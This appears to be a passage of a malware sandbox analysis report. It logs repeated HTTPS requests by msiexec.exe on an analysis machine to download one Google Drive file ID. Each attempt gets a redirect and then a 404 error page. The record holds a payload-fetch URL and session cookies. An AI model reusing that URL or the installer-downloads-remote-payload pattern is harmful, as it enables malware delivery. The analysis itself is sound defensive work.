                                                                                          2025-01-10 14:17:35 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRUz2FZIkOfgU2aeRyQlw5lPPsaLEp_bq5g_wWDlyC2Sl1Seo2ZK5Mst5n6l-Yz6chmkiAMhmE
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:35 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-ZfsrMncR0JDfXumceUBEVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6f 4a 33 31 44 58 39 36 30 55 34 61 56 50 52 34 5f 7a 57 6b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UoJ31DX960U4aVPR4_zWkg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.650017142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:36 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:36 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:36 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jKuMX8b_3NLzTNq69KyXtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.650018216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:37 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:37 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSl9bKnFmla5yI3jftmUGd5Y01uJ_87WEoaqxjNAIiJTBK-u85HW1ZY3hjaiJOk282w
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:37 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-vpoGtNTFVBEq09nPPrHhPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 61 5f 4b 5f 4d 62 69 6f 5a 68 6c 2d 57 30 36 6e 4c 4a 49 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ua_K_MbioZhl-W06nLJI_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.650019142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:38 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:39 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:38 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce--5fgUzjsOf4hV21T-Av4SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.650020216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:39 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:40 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ-nzvoC-4Y3YrNEtD6IjLPj8vWDW6UeEprxZZPFR_fpsxJH9ZauF2vRGNa4ash7M19P74EslM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:40 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-PsAKkt8JSluzSuCkRnObUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 78 70 55 36 53 52 54 57 6a 31 6c 53 73 37 6a 70 30 38 75 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cxpU6SRTWj1lSs7jp08uUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.650021142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:40 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:41 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:41 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-yWpF4vq17NV_19Egl0Rj1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          37192.168.2.650022216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:42 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:42 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgT82xnqDMXBe2NQBSTh0KXnC2SFPzxHYbugdGAhCPmRUN84c0JF2ijRI8qU80jplHR28k_JWm0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:42 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-psnLVJ-QUzYvu4-bzGkMdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 34 42 69 6b 7a 4c 67 34 59 4b 67 43 66 57 66 50 46 59 45 5f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="14BikzLg4YKgCfWfPFYE_A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          38192.168.2.650023142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:43 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:43 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:43 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
